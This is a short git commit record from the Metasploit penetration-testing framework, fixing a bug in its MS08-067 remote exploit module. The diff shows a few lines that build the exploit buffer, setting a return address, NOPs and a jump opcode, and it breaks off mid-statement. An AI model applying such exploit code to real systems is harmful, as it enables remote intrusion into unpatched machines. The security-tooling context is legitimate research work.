Patch for ms08-067 from antoine, fixes braindead bug on my part, should increase reliability

git-svn-id: file:///home/svn/framework3/trunk@5805 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2008-10-30 17:21:07 +00:00
parent a4d53893ac
commit dfbc35da3c
1 changed files with 1 additions and 0 deletions

View File

@ -223,6 +223,7 @@ class Metasploit3 < Msf::Exploit::Remote
jumper = Rex::Text.rand_text_alpha(70).upcase
jumper[ 4,4] = [target.ret].pack("V")
jumper[56,2] = make_nops(2)
jumper[58,2] = "\xeb\x62"
path =